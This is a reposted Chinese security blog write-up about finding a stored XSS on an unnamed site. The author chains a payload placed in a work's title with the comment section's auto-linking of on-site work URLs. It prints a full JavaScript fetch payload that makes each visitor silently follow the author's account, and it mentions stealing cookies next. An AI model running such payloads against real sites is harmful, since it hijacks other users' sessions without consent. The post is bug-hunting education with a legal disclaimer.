记一次有趣的XSS漏洞挖掘

admin 2024年4月22日08:39:40评论19 views字数 1765阅读5分53秒阅读模式

扫码领资料

获网安教程

记一次有趣的XSS漏洞挖掘

记一次有趣的XSS漏洞挖掘

功能点一

首先这里的话是存在一个简单的功能点,就是可以发布自己的一个作品,这里挖掘的时候想法肯定就是插一些xss的payload(因为我们就是挖掘xss嘛),所以的话就插了一些payload进行测试,意料之中,肯定是没有反应的。但是我们肯定是不能放弃的,因为在挖掘的时候很多漏洞可能是组合在一起产生的,所以我们可以多一些脑洞。
记一次有趣的XSS漏洞挖掘
这个name参数就是我们的作品名称。
记一次有趣的XSS漏洞挖掘
发出来的效果就是这么一回事。
记一次有趣的XSS漏洞挖掘
然后呢,这里没有发现漏洞,那么我们继续测试其他的功能点。

功能点二

这个功能点也是很常见的功能,就是评论。评论区一般都是xss的高发区也是重点防护区。当然我们也是可以进行一个简单的payload测试
记一次有趣的XSS漏洞挖掘
一样的没有任何反应,但是这里的话我在看别人的评论的时候就发现了一个好玩的事情,如果评论的时候,我们评论的内容是该网站的其他作品的链接,那么它会自动转换为该作品的名称,一个a标签(外站的链接不行)
记一次有趣的XSS漏洞挖掘
那么这里就是有思路了,把这两个功能点结合一下或许就可以变成一个有趣的xss漏洞。把之前我们存在xss payload的作品链接在我们的作品底下进行评论
记一次有趣的XSS漏洞挖掘
记一次有趣的XSS漏洞挖掘
好!符合预期,这里确实存在xss漏洞,那么我们如何把这个危害进行扩大呢,我们都知道xss主要是因为js的问题,而js是可以发起http请求的,那么这里我们就有一个思路了(当时也是看了大佬挖掘b站xss漏洞的启发),我们抓取api,然后自己编写一段请求代码,只要别人访问我们的作品(或者我们在别人作品底下进行评论),都会触发这段js代码从而发起请求。借助一些xss在线平台,编写以下代码,通过fetch发起请求,让其他用户自动关注我的账号。
function getHeaders() {
return {
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
"accept-language": "zh-CN,zh;q=0.9",
"cache-control": "max-age=0",
"content-type": "application/x-www-form-urlencoded",
"sec-ch-ua": ""Not?A_Brand";v="8", "Chromium";v="108", "Google Chrome";v="108"",
"sec-ch-ua-mobile": "?0",
"sec-ch-ua-platform": ""Windows"",
"sec-fetch-dest": "document",
"sec-fetch-mode": "navigate",
"sec-fetch-site": "same-site",
"Content-Type": 'application/json'
};
}
function apiGet() {
return fetch("https://xxxxxxx/follow", {
method: "POST",
headers: getHeaders(),
mode: "cors",
body: JSON.stringify({
"followed_user_id": xxxxxx,
"state": 1
})
}).then(function () {
console.log("关注成功");
})
}
apiGet()
在其他作品底下进行评论
记一次有趣的XSS漏洞挖掘
抓包可以看到确实是已经发起请求了,那么坐等消息即可(狗头)
记一次有趣的XSS漏洞挖掘
可以的,百万关注不是梦啊,这里其实可以借助xss平台进行更多的操作,比如盗取cookie...
记一次有趣的XSS漏洞挖掘

总结

在挖掘一些漏洞的时候我们的思路需要发散一些,碰到功能点我们可以去思考开发者开发这个功能是想实现什么东西,多个不同的功能点是不是组合在一些会产生一些特殊的化学反应。
文章来源: https://xz.aliyun.com/t/13863文章作者:xiaoqiuxx如有侵权请联系我们,我们会进行删除并致歉

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。

原文始发于微信公众号(白帽子左一):记一次有趣的XSS漏洞挖掘

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月22日08:39:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次有趣的XSS漏洞挖掘https://cn-sec.com/archives/2573241.html

发表评论

匿名网友 填写信息